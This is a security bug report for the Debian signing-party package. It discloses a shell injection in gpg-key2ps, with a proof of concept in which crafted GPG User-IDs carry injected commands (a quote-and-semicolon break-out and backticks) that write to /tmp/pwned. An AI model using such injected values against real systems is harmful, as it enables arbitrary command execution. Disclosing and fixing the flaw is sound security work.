Package: signing-party Version: 1.1-1 Severity: important Tags: security File: /usr/bin/gpg-key2ps
Stefan `Sec` Zehl disovered an unsafe shell call in gpg-key2ps(1),
enabling shell injection in User-IDs:
$ export GNUPGHOME="$(mktemp --tmpdir --directory)"
$ gpg --passphrase "" --batch --quick-gen-key 'foo"; echo pwned $USER
>>/tmp/pwned; echo "bar <us...@example.net>'
$ gpg --passphrase "" --batch --quick-gen-key 'foo `date >>/tmp/pwned` bar
<us...@example.net>'
$ gpg-key2ps us...@example.net us...@example.net >/dev/null
$ cat /tmp/pwned
pwned guilhem
Tue Apr 30 19:42:48 CEST 2019
--
Guilhem.
signature.asc
Description: PGP signature
